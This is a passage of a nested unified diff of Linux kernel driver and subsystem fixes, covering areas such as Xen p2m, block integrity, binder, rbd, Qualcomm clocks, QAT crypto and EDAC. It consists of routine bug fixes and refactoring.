+@@ -91,7 +91,7 @@ static int iosf_mbi_pci_write_mdr(u32 mcrx, u32 mcr, u32 mdr)
+ 
+ fail_write:
+ 	dev_err(&mbi_pdev->dev, "PCI config access failed with %d\n", result);
+-	return result;
++	return pcibios_err_to_errno(result);
+ }
+ 
+ int iosf_mbi_read(u8 port, u8 opcode, u32 offset, u32 *mdr)
+diff --git a/arch/x86/xen/p2m.c b/arch/x86/xen/p2m.c
+index 58db86f7b3846..a02cc54338897 100644
+--- a/arch/x86/xen/p2m.c
++++ b/arch/x86/xen/p2m.c
+@@ -736,7 +736,7 @@ int set_foreign_p2m_mapping(struct gnttab_map_grant_ref *map_ops,
+ 		 * immediate unmapping.
+ 		 */
+ 		map_ops[i].status = GNTST_general_error;
+-		unmap[0].host_addr = map_ops[i].host_addr,
++		unmap[0].host_addr = map_ops[i].host_addr;
+ 		unmap[0].handle = map_ops[i].handle;
+ 		map_ops[i].handle = INVALID_GRANT_HANDLE;
+ 		if (map_ops[i].flags & GNTMAP_device_map)
+@@ -746,7 +746,7 @@ int set_foreign_p2m_mapping(struct gnttab_map_grant_ref *map_ops,
+ 
+ 		if (kmap_ops) {
+ 			kmap_ops[i].status = GNTST_general_error;
+-			unmap[1].host_addr = kmap_ops[i].host_addr,
++			unmap[1].host_addr = kmap_ops[i].host_addr;
+ 			unmap[1].handle = kmap_ops[i].handle;
+ 			kmap_ops[i].handle = INVALID_GRANT_HANDLE;
+ 			if (kmap_ops[i].flags & GNTMAP_device_map)
+diff --git a/block/bio-integrity.c b/block/bio-integrity.c
+index 4533eb4916610..adbc00449a9c6 100644
+--- a/block/bio-integrity.c
++++ b/block/bio-integrity.c
+@@ -199,8 +199,7 @@ bool bio_integrity_prep(struct bio *bio)
+ 	unsigned long start, end;
+ 	unsigned int len, nr_pages;
+ 	unsigned int bytes, offset, i;
+-	unsigned int intervals;
+-	blk_status_t status;
++	gfp_t gfp = GFP_NOIO;
+ 
+ 	if (!bi)
+ 		return true;
+@@ -223,13 +222,19 @@ bool bio_integrity_prep(struct bio *bio)
+ 		if (!bi->profile->generate_fn ||
+ 		    !(bi->flags & BLK_INTEGRITY_GENERATE))
+ 			return true;
++
++		/*
++		 * Zero the memory allocated to not leak uninitialized kernel
++		 * memory to disk.  For PI this only affects the app tag, but
++		 * for non-integrity metadata it affects the entire metadata
++		 * buffer.
++		 */
++		gfp |= __GFP_ZERO;
+ 	}
+-	intervals = bio_integrity_intervals(bi, bio_sectors(bio));
+ 
+ 	/* Allocate kernel buffer for protection data */
+-	len = intervals * bi->tuple_size;
+-	buf = kmalloc(len, GFP_NOIO);
+-	status = BLK_STS_RESOURCE;
++	len = bio_integrity_bytes(bi, bio_sectors(bio));
++	buf = kmalloc(len, gfp);
+ 	if (unlikely(buf == NULL)) {
+ 		printk(KERN_ERR "could not allocate integrity buffer\n");
+ 		goto err_end_io;
+@@ -244,7 +249,6 @@ bool bio_integrity_prep(struct bio *bio)
+ 	if (IS_ERR(bip)) {
+ 		printk(KERN_ERR "could not allocate data integrity bioset\n");
+ 		kfree(buf);
+-		status = BLK_STS_RESOURCE;
+ 		goto err_end_io;
+ 	}
+ 
+@@ -272,7 +276,6 @@ bool bio_integrity_prep(struct bio *bio)
+ 
+ 		if (ret == 0) {
+ 			printk(KERN_ERR "could not attach integrity payload\n");
+-			status = BLK_STS_RESOURCE;
+ 			goto err_end_io;
+ 		}
+ 
+@@ -294,7 +297,7 @@ bool bio_integrity_prep(struct bio *bio)
+ 	return true;
+ 
+ err_end_io:
+-	bio->bi_status = status;
++	bio->bi_status = BLK_STS_RESOURCE;
+ 	bio_endio(bio);
+ 	return false;
+ 
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 46111f8c12e61..e0ef648df265b 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -569,9 +569,7 @@ static bool binder_has_work(struct binder_thread *thread, bool do_proc_work)
+ static bool binder_available_for_proc_work_ilocked(struct binder_thread *thread)
+ {
+ 	return !thread->transaction_stack &&
+-		binder_worklist_empty_ilocked(&thread->todo) &&
+-		(thread->looper & (BINDER_LOOPER_STATE_ENTERED |
+-				   BINDER_LOOPER_STATE_REGISTERED));
++		binder_worklist_empty_ilocked(&thread->todo);
+ }
+ 
+ static void binder_wakeup_poll_threads_ilocked(struct binder_proc *proc,
+diff --git a/drivers/ata/libata-scsi.c b/drivers/ata/libata-scsi.c
+index 65fde5717928b..c8970453b4d9f 100644
+--- a/drivers/ata/libata-scsi.c
++++ b/drivers/ata/libata-scsi.c
+@@ -900,11 +900,8 @@ static void ata_gen_passthru_sense(struct ata_queued_cmd *qc)
+ 				   &sense_key, &asc, &ascq, verbose);
+ 		ata_scsi_set_sense(qc->dev, cmd, sense_key, asc, ascq);
+ 	} else {
+-		/*
+-		 * ATA PASS-THROUGH INFORMATION AVAILABLE
+-		 * Always in descriptor format sense.
+-		 */
+-		scsi_build_sense(cmd, 1, RECOVERED_ERROR, 0, 0x1D);
++		/* ATA PASS-THROUGH INFORMATION AVAILABLE */
++		ata_scsi_set_sense(qc->dev, cmd, RECOVERED_ERROR, 0, 0x1D);
+ 	}
+ 
+ 	if ((cmd->sense_buffer[0] & 0x7f) >= 0x72) {
+diff --git a/drivers/auxdisplay/ht16k33.c b/drivers/auxdisplay/ht16k33.c
+index 02425991c1590..57b4efff344e3 100644
+--- a/drivers/auxdisplay/ht16k33.c
++++ b/drivers/auxdisplay/ht16k33.c
+@@ -507,6 +507,7 @@ static int ht16k33_led_probe(struct device *dev, struct led_classdev *led,
+ 	led->max_brightness = MAX_BRIGHTNESS;
+ 
+ 	err = devm_led_classdev_register_ext(dev, led, &init_data);
++	fwnode_handle_put(init_data.fwnode);
+ 	if (err)
+ 		dev_err(dev, "Failed to register LED\n");
+ 
+diff --git a/drivers/base/devres.c b/drivers/base/devres.c
+index 4ab2b50ee38f4..f9add2ecdc554 100644
+--- a/drivers/base/devres.c
++++ b/drivers/base/devres.c
+@@ -892,9 +892,12 @@ void *devm_krealloc(struct device *dev, void *ptr, size_t new_size, gfp_t gfp)
+ 	/*
+ 	 * Otherwise: allocate new, larger chunk. We need to allocate before
+ 	 * taking the lock as most probably the caller uses GFP_KERNEL.
++	 * alloc_dr() will call check_dr_size() to reserve extra memory
++	 * for struct devres automatically, so size @new_size user request
++	 * is delivered to it directly as devm_kmalloc() does.
+ 	 */
+ 	new_dr = alloc_dr(devm_kmalloc_release,
+-			  total_new_size, gfp, dev_to_node(dev));
++			  new_size, gfp, dev_to_node(dev));
+ 	if (!new_dr)
+ 		return NULL;
+ 
+@@ -1218,7 +1221,11 @@ EXPORT_SYMBOL_GPL(__devm_alloc_percpu);
+  */
+ void devm_free_percpu(struct device *dev, void __percpu *pdata)
+ {
+-	WARN_ON(devres_destroy(dev, devm_percpu_release, devm_percpu_match,
++	/*
++	 * Use devres_release() to prevent memory leakage as
++	 * devm_free_pages() does.
++	 */
++	WARN_ON(devres_release(dev, devm_percpu_release, devm_percpu_match,
+ 			       (__force void *)pdata));
+ }
+ EXPORT_SYMBOL_GPL(devm_free_percpu);
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index f58ca9ce35031..4f8efc829a59f 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -362,7 +362,7 @@ enum rbd_watch_state {
+ enum rbd_lock_state {
+ 	RBD_LOCK_STATE_UNLOCKED,
+ 	RBD_LOCK_STATE_LOCKED,
+-	RBD_LOCK_STATE_RELEASING,
++	RBD_LOCK_STATE_QUIESCING,
+ };
+ 
+ /* WatchNotify::ClientId */
+@@ -422,7 +422,7 @@ struct rbd_device {
+ 	struct list_head	running_list;
+ 	struct completion	acquire_wait;
+ 	int			acquire_err;
+-	struct completion	releasing_wait;
++	struct completion	quiescing_wait;
+ 
+ 	spinlock_t		object_map_lock;
+ 	u8			*object_map;
+@@ -525,7 +525,7 @@ static bool __rbd_is_lock_owner(struct rbd_device *rbd_dev)
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 
+ 	return rbd_dev->lock_state == RBD_LOCK_STATE_LOCKED ||
+-	       rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING;
++	       rbd_dev->lock_state == RBD_LOCK_STATE_QUIESCING;
+ }
+ 
+ static bool rbd_is_lock_owner(struct rbd_device *rbd_dev)
+@@ -3458,13 +3458,14 @@ static void rbd_lock_del_request(struct rbd_img_request *img_req)
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 	spin_lock(&rbd_dev->lock_lists_lock);
+ 	if (!list_empty(&img_req->lock_item)) {
++		rbd_assert(!list_empty(&rbd_dev->running_list));
+ 		list_del_init(&img_req->lock_item);
+-		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
++		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_QUIESCING &&
+ 			       list_empty(&rbd_dev->running_list));
+ 	}
+ 	spin_unlock(&rbd_dev->lock_lists_lock);
+ 	if (need_wakeup)
+-		complete(&rbd_dev->releasing_wait);
++		complete(&rbd_dev->quiescing_wait);
+ }
+ 
+ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+@@ -3477,11 +3478,6 @@ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+ 	if (rbd_lock_add_request(img_req))
+ 		return 1;
+ 
+-	if (rbd_dev->opts->exclusive) {
+-		WARN_ON(1); /* lock got released? */
+-		return -EROFS;
+-	}
+-
+ 	/*
+ 	 * Note the use of mod_delayed_work() in rbd_acquire_lock()
+ 	 * and cancel_delayed_work() in wake_lock_waiters().
+@@ -4182,16 +4178,16 @@ static bool rbd_quiesce_lock(struct rbd_device *rbd_dev)
+ 	/*
+ 	 * Ensure that all in-flight IO is flushed.
+ 	 */
+-	rbd_dev->lock_state = RBD_LOCK_STATE_RELEASING;
+-	rbd_assert(!completion_done(&rbd_dev->releasing_wait));
++	rbd_dev->lock_state = RBD_LOCK_STATE_QUIESCING;
++	rbd_assert(!completion_done(&rbd_dev->quiescing_wait));
+ 	if (list_empty(&rbd_dev->running_list))
+ 		return true;
+ 
+ 	up_write(&rbd_dev->lock_rwsem);
+-	wait_for_completion(&rbd_dev->releasing_wait);
++	wait_for_completion(&rbd_dev->quiescing_wait);
+ 
+ 	down_write(&rbd_dev->lock_rwsem);
+-	if (rbd_dev->lock_state != RBD_LOCK_STATE_RELEASING)
++	if (rbd_dev->lock_state != RBD_LOCK_STATE_QUIESCING)
+ 		return false;
+ 
+ 	rbd_assert(list_empty(&rbd_dev->running_list));
+@@ -4602,6 +4598,10 @@ static void rbd_reacquire_lock(struct rbd_device *rbd_dev)
+ 			rbd_warn(rbd_dev, "failed to update lock cookie: %d",
+ 				 ret);
+ 
++		if (rbd_dev->opts->exclusive)
++			rbd_warn(rbd_dev,
++			     "temporarily releasing lock on exclusive mapping");
++
+ 		/*
+ 		 * Lock cookie cannot be updated on older OSDs, so do
+ 		 * a manual release and queue an acquire.
+@@ -5383,7 +5383,7 @@ static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ 	INIT_LIST_HEAD(&rbd_dev->acquiring_list);
+ 	INIT_LIST_HEAD(&rbd_dev->running_list);
+ 	init_completion(&rbd_dev->acquire_wait);
+-	init_completion(&rbd_dev->releasing_wait);
++	init_completion(&rbd_dev->quiescing_wait);
+ 
+ 	spin_lock_init(&rbd_dev->object_map_lock);
+ 
+@@ -6589,11 +6589,6 @@ static int rbd_add_acquire_lock(struct rbd_device *rbd_dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * The lock may have been released by now, unless automatic lock
+-	 * transitions are disabled.
+-	 */
+-	rbd_assert(!rbd_dev->opts->exclusive || rbd_is_lock_owner(rbd_dev));
+ 	return 0;
+ }
+ 
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 6a772b955d69d..2d8c405a27a6c 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -545,6 +545,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x13d3, 0x3571), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3591), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0489, 0xe125), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
+ 
+ 	/* Realtek Bluetooth devices */
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x0bda, 0xe0, 0x01, 0x01),
+diff --git a/drivers/char/hw_random/amd-rng.c b/drivers/char/hw_random/amd-rng.c
+index 0555e3838bce1..5229da114377a 100644
+--- a/drivers/char/hw_random/amd-rng.c
++++ b/drivers/char/hw_random/amd-rng.c
+@@ -142,8 +142,10 @@ static int __init amd_rng_mod_init(void)
+ 
+ found:
+ 	err = pci_read_config_dword(pdev, 0x58, &pmbase);
+-	if (err)
++	if (err) {
++		err = pcibios_err_to_errno(err);
+ 		goto put_dev;
++	}
+ 
+ 	pmbase &= 0x0000FF00;
+ 	if (pmbase == 0) {
+diff --git a/drivers/char/tpm/eventlog/common.c b/drivers/char/tpm/eventlog/common.c
+index 8512ec76d5260..4a6186f9f8899 100644
+--- a/drivers/char/tpm/eventlog/common.c
++++ b/drivers/char/tpm/eventlog/common.c
+@@ -47,6 +47,8 @@ static int tpm_bios_measurements_open(struct inode *inode,
+ 	if (!err) {
+ 		seq = file->private_data;
+ 		seq->private = chip;
++	} else {
++		put_device(&chip->dev);
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/clk/clk-en7523.c b/drivers/clk/clk-en7523.c
+index 29f0126cbd05b..d22fae24a3dab 100644
+--- a/drivers/clk/clk-en7523.c
++++ b/drivers/clk/clk-en7523.c
+@@ -41,6 +41,7 @@ struct en_clk_desc {
+ 	u8 div_shift;
+ 	u16 div_val0;
+ 	u8 div_step;
++	u8 div_offset;
+ };
+ 
+ struct en_clk_gate {
+@@ -68,6 +69,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_EMI,
+ 		.name = "emi",
+@@ -81,6 +83,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_BUS,
+ 		.name = "bus",
+@@ -94,6 +97,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_SLIC,
+ 		.name = "slic",
+@@ -134,13 +138,14 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_CRYPTO,
+ 		.name = "crypto",
+ 
+ 		.base_reg = REG_CRYPTO_CLKSRC,
+ 		.base_bits = 1,
+-		.base_shift = 8,
++		.base_shift = 0,
+ 		.base_values = emi_base,
+ 		.n_base_values = ARRAY_SIZE(emi_base),
+ 	}
+@@ -185,7 +190,7 @@ static u32 en7523_get_div(void __iomem *base, int i)
+ 	if (!val && desc->div_val0)
+ 		return desc->div_val0;
+ 
+-	return (val + 1) * desc->div_step;
++	return (val + desc->div_offset) * desc->div_step;
+ }
+ 
+ static int en7523_pci_is_enabled(struct clk_hw *hw)
+diff --git a/drivers/clk/davinci/da8xx-cfgchip.c b/drivers/clk/davinci/da8xx-cfgchip.c
+index 4103d605e804f..6faa4372ed65a 100644
+--- a/drivers/clk/davinci/da8xx-cfgchip.c
++++ b/drivers/clk/davinci/da8xx-cfgchip.c
+@@ -505,7 +505,7 @@ da8xx_cfgchip_register_usb0_clk48(struct device *dev,
+ 	const char * const parent_names[] = { "usb_refclkin", "pll0_auxclk" };
+ 	struct clk *fck_clk;
+ 	struct da8xx_usb0_clk48 *usb0;
+-	struct clk_init_data init;
++	struct clk_init_data init = {};
+ 	int ret;
+ 
+ 	fck_clk = devm_clk_get(dev, "fck");
+@@ -579,7 +579,7 @@ da8xx_cfgchip_register_usb1_clk48(struct device *dev,
+ {
+ 	const char * const parent_names[] = { "usb0_clk48", "usb_refclkin" };
+ 	struct da8xx_usb1_clk48 *usb1;
+-	struct clk_init_data init;
++	struct clk_init_data init = {};
+ 	int ret;
+ 
+ 	usb1 = devm_kzalloc(dev, sizeof(*usb1), GFP_KERNEL);
+diff --git a/drivers/clk/qcom/camcc-sc7280.c b/drivers/clk/qcom/camcc-sc7280.c
+index ec163ea769f59..932096a972bc3 100644
+--- a/drivers/clk/qcom/camcc-sc7280.c
++++ b/drivers/clk/qcom/camcc-sc7280.c
+@@ -2260,6 +2260,7 @@ static struct gdsc cam_cc_bps_gdsc = {
+ 		.name = "cam_cc_bps_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = HW_CTRL | RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2269,6 +2270,7 @@ static struct gdsc cam_cc_ife_0_gdsc = {
+ 		.name = "cam_cc_ife_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2278,6 +2280,7 @@ static struct gdsc cam_cc_ife_1_gdsc = {
+ 		.name = "cam_cc_ife_1_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2287,6 +2290,7 @@ static struct gdsc cam_cc_ife_2_gdsc = {
+ 		.name = "cam_cc_ife_2_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2296,6 +2300,7 @@ static struct gdsc cam_cc_ipe_0_gdsc = {
+ 		.name = "cam_cc_ipe_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = HW_CTRL | RETAIN_FF_ENABLE,
+ };
+ 
+diff --git a/drivers/clk/qcom/clk-branch.h b/drivers/clk/qcom/clk-branch.h
+index 17a58119165e8..55b3a2c3afed9 100644
+--- a/drivers/clk/qcom/clk-branch.h
++++ b/drivers/clk/qcom/clk-branch.h
+@@ -37,6 +37,32 @@ struct clk_branch {
+ 	struct clk_regmap clkr;
+ };
+ 
++/* Branch clock common bits for HLOS-owned clocks */
++#define CBCR_FORCE_MEM_CORE_ON		BIT(14)
++#define CBCR_FORCE_MEM_PERIPH_ON	BIT(13)
++#define CBCR_FORCE_MEM_PERIPH_OFF	BIT(12)
++
++static inline void qcom_branch_set_force_mem_core(struct regmap *regmap,
++						  struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_CORE_ON,
++			   on ? CBCR_FORCE_MEM_CORE_ON : 0);
++}
++
++static inline void qcom_branch_set_force_periph_on(struct regmap *regmap,
++						   struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_PERIPH_ON,
++			   on ? CBCR_FORCE_MEM_PERIPH_ON : 0);
++}
++
++static inline void qcom_branch_set_force_periph_off(struct regmap *regmap,
++						    struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_PERIPH_OFF,
++			   on ? CBCR_FORCE_MEM_PERIPH_OFF : 0);
++}
++
+ extern const struct clk_ops clk_branch_ops;
+ extern const struct clk_ops clk_branch2_ops;
+ extern const struct clk_ops clk_branch_simple_ops;
+diff --git a/drivers/clk/qcom/clk-rcg2.c b/drivers/clk/qcom/clk-rcg2.c
+index dc797bd137caf..e46bb60dcda41 100644
+--- a/drivers/clk/qcom/clk-rcg2.c
++++ b/drivers/clk/qcom/clk-rcg2.c
+@@ -1136,7 +1136,39 @@ clk_rcg2_shared_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ 	return clk_rcg2_recalc_rate(hw, parent_rate);
+ }
+ 
++static int clk_rcg2_shared_init(struct clk_hw *hw)
++{
++	/*
++	 * This does a few things:
++	 *
++	 *  1. Sets rcg->parked_cfg to reflect the value at probe so that the
++	 *     proper parent is reported from clk_rcg2_shared_get_parent().
++	 *
++	 *  2. Clears the force enable bit of the RCG because we rely on child
++	 *     clks (branches) to turn the RCG on/off with a hardware feedback
++	 *     mechanism and only set the force enable bit in the RCG when we
++	 *     want to make sure the clk stays on for parent switches or
++	 *     parking.
++	 *
++	 *  3. Parks shared RCGs on the safe source at registration because we
++	 *     can't be certain that the parent clk will stay on during boot,
++	 *     especially if the parent is shared. If this RCG is enabled at
++	 *     boot, and the parent is turned off, the RCG will get stuck on. A
++	 *     GDSC can wedge if is turned on and the RCG is stuck on because
++	 *     the GDSC's controller will hang waiting for the clk status to
++	 *     toggle on when it never does.
++	 *
++	 * The safest option here is to "park" the RCG at init so that the clk
++	 * can never get stuck on or off. This ensures the GDSC can't get
++	 * wedged.
++	 */
++	clk_rcg2_shared_disable(hw);
++
++	return 0;
++}
++
+ const struct clk_ops clk_rcg2_shared_ops = {
++	.init = clk_rcg2_shared_init,
+ 	.enable = clk_rcg2_shared_enable,
+ 	.disable = clk_rcg2_shared_disable,
+ 	.get_parent = clk_rcg2_shared_get_parent,
+diff --git a/drivers/clk/qcom/gcc-sc7280.c b/drivers/clk/qcom/gcc-sc7280.c
+index 46d41ebce2b08..2067e39840cb4 100644
+--- a/drivers/clk/qcom/gcc-sc7280.c
++++ b/drivers/clk/qcom/gcc-sc7280.c
+@@ -3469,6 +3469,9 @@ static int gcc_sc7280_probe(struct platform_device *pdev)
+ 	regmap_update_bits(regmap, 0x71004, BIT(0), BIT(0));
+ 	regmap_update_bits(regmap, 0x7100C, BIT(13), BIT(13));
+ 
++	/* FORCE_MEM_CORE_ON for ufs phy ice core clocks */
++	qcom_branch_set_force_mem_core(regmap, gcc_ufs_phy_ice_core_clk, true);
++
+ 	ret = qcom_cc_register_rcg_dfs(regmap, gcc_dfs_clocks,
+ 			ARRAY_SIZE(gcc_dfs_clocks));
+ 	if (ret)
+diff --git a/drivers/clk/qcom/gpucc-sm8350.c b/drivers/clk/qcom/gpucc-sm8350.c
+index 5367ce654ac9a..cc9fcbc884650 100644
+--- a/drivers/clk/qcom/gpucc-sm8350.c
++++ b/drivers/clk/qcom/gpucc-sm8350.c
+@@ -2,6 +2,7 @@
+ /*
+  * Copyright (c) 2019-2020, The Linux Foundation. All rights reserved.
+  * Copyright (c) 2022, Linaro Limited
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ 
+ #include <linux/clk.h>
+@@ -147,7 +148,7 @@ static struct clk_rcg2 gpu_cc_gmu_clk_src = {
+ 		.parent_data = gpu_cc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(gpu_cc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -169,7 +170,7 @@ static struct clk_rcg2 gpu_cc_hub_clk_src = {
+ 		.parent_data = gpu_cc_parent_data_1,
+ 		.num_parents = ARRAY_SIZE(gpu_cc_parent_data_1),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/cpufreq/ti-cpufreq.c b/drivers/cpufreq/ti-cpufreq.c
+index 61ef653bcf56f..15e2ef8303508 100644
+--- a/drivers/cpufreq/ti-cpufreq.c
++++ b/drivers/cpufreq/ti-cpufreq.c
+@@ -381,7 +381,7 @@ static int ti_cpufreq_probe(struct platform_device *pdev)
+ 
+ 	ret = dev_pm_opp_set_config(opp_data->cpu_dev, &config);
+ 	if (ret < 0) {
+-		dev_err(opp_data->cpu_dev, "Failed to set OPP config\n");
++		dev_err_probe(opp_data->cpu_dev, ret, "Failed to set OPP config\n");
+ 		goto fail_put_node;
+ 	}
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_cfg.c b/drivers/crypto/qat/qat_common/adf_cfg.c
+index 1931e5b37f2bd..368d14d81503c 100644
+--- a/drivers/crypto/qat/qat_common/adf_cfg.c
++++ b/drivers/crypto/qat/qat_common/adf_cfg.c
+@@ -276,17 +276,19 @@ int adf_cfg_add_key_value_param(struct adf_accel_dev *accel_dev,
+ 	 * 3. if the key exists with the same value, then return without doing
+ 	 *    anything (the newly created key_val is freed).
+ 	 */
++	down_write(&cfg->lock);
+ 	if (!adf_cfg_key_val_get(accel_dev, section_name, key, temp_val)) {
+ 		if (strncmp(temp_val, key_val->val, sizeof(temp_val))) {
+ 			adf_cfg_keyval_remove(key, section);
+ 		} else {
+ 			kfree(key_val);
+-			return 0;
++			goto out;
+ 		}
+ 	}
+ 
+-	down_write(&cfg->lock);
+ 	adf_cfg_keyval_add(key_val, section);
++
++out:
+ 	up_write(&cfg->lock);
+ 	return 0;
+ }
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index 82e7acfda6ed0..e323e1a5f20f3 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -4423,7 +4423,9 @@ static int udma_get_mmrs(struct platform_device *pdev, struct udma_dev *ud)
+ 		ud->rchan_cnt = UDMA_CAP2_RCHAN_CNT(cap2);
+ 		break;
+ 	case DMA_TYPE_BCDMA:
+-		ud->bchan_cnt = BCDMA_CAP2_BCHAN_CNT(cap2);
++		ud->bchan_cnt = BCDMA_CAP2_BCHAN_CNT(cap2) +
++				BCDMA_CAP3_HBCHAN_CNT(cap3) +
++				BCDMA_CAP3_UBCHAN_CNT(cap3);
+ 		ud->tchan_cnt = BCDMA_CAP2_TCHAN_CNT(cap2);
+ 		ud->rchan_cnt = BCDMA_CAP2_RCHAN_CNT(cap2);
+ 		ud->rflow_cnt = ud->rchan_cnt;
+diff --git a/drivers/edac/Makefile b/drivers/edac/Makefile
+index 2d1641a27a28f..a98e1981df157 100644
+--- a/drivers/edac/Makefile
++++ b/drivers/edac/Makefile
+@@ -54,11 +54,13 @@ obj-$(CONFIG_EDAC_MPC85XX)		+= mpc85xx_edac_mod.o
+ layerscape_edac_mod-y			:= fsl_ddr_edac.o layerscape_edac.o
+ obj-$(CONFIG_EDAC_LAYERSCAPE)		+= layerscape_edac_mod.o
+ 
+-skx_edac-y				:= skx_common.o skx_base.o
+-obj-$(CONFIG_EDAC_SKX)			+= skx_edac.o
++skx_edac_common-y			:= skx_common.o
+ 
+-i10nm_edac-y				:= skx_common.o i10nm_base.o
+-obj-$(CONFIG_EDAC_I10NM)		+= i10nm_edac.o
++skx_edac-y				:= skx_base.o
++obj-$(CONFIG_EDAC_SKX)			+= skx_edac.o skx_edac_common.o
++
++i10nm_edac-y				:= i10nm_base.o
++obj-$(CONFIG_EDAC_I10NM)		+= i10nm_edac.o skx_edac_common.o
+ 
+ obj-$(CONFIG_EDAC_CELL)			+= cell_edac.o
+ obj-$(CONFIG_EDAC_PPC4XX)		+= ppc4xx_edac.o
+diff --git a/drivers/edac/skx_common.c b/drivers/edac/skx_common.c
+index f0f8e98f6efb2..e218909f9f9e8 100644
+--- a/drivers/edac/skx_common.c
++++ b/drivers/edac/skx_common.c
+@@ -48,7 +48,7 @@ static u64 skx_tolm, skx_tohm;
+ static LIST_HEAD(dev_edac_list);
+ static bool skx_mem_cfg_2lm;
+ 
+-int __init skx_adxl_get(void)
++int skx_adxl_get(void)
+ {
+ 	const char * const *names;
+ 	int i, j;
+@@ -110,12 +110,14 @@ int __init skx_adxl_get(void)
+ 
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_GPL(skx_adxl_get);
+ 
+-void __exit skx_adxl_put(void)
++void skx_adxl_put(void)
+ {
+ 	kfree(adxl_values);
+ 	kfree(adxl_msg);
+ }
++EXPORT_SYMBOL_GPL(skx_adxl_put);
+ 
+ static bool skx_adxl_decode(struct decoded_addr *res, bool error_in_1st_level_mem)
+ {
+@@ -187,12 +189,14 @@ void skx_set_mem_cfg(bool mem_cfg_2lm)
+ {
+ 	skx_mem_cfg_2lm = mem_cfg_2lm;
+ }
++EXPORT_SYMBOL_GPL(skx_set_mem_cfg);
+ 
+ void skx_set_decode(skx_decode_f decode, skx_show_retry_log_f show_retry_log)
+ {
+ 	driver_decode = decode;
+ 	skx_show_retry_rd_err_log = show_retry_log;
+ }
++EXPORT_SYMBOL_GPL(skx_set_decode);
+ 
+ int skx_get_src_id(struct skx_dev *d, int off, u8 *id)
+ {
+@@ -206,6 +210,7 @@ int skx_get_src_id(struct skx_dev *d, int off, u8 *id)
+ 	*id = GET_BITFIELD(reg, 12, 14);
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(skx_get_src_id);
+ 
+ int skx_get_node_id(struct skx_dev *d, u8 *id)
+ {
+@@ -219,6 +224,7 @@ int skx_get_node_id(struct skx_dev *d, u8 *id)
+ 	*id = GET_BITFIELD(reg, 0, 2);
+ 	return 0;
+ }
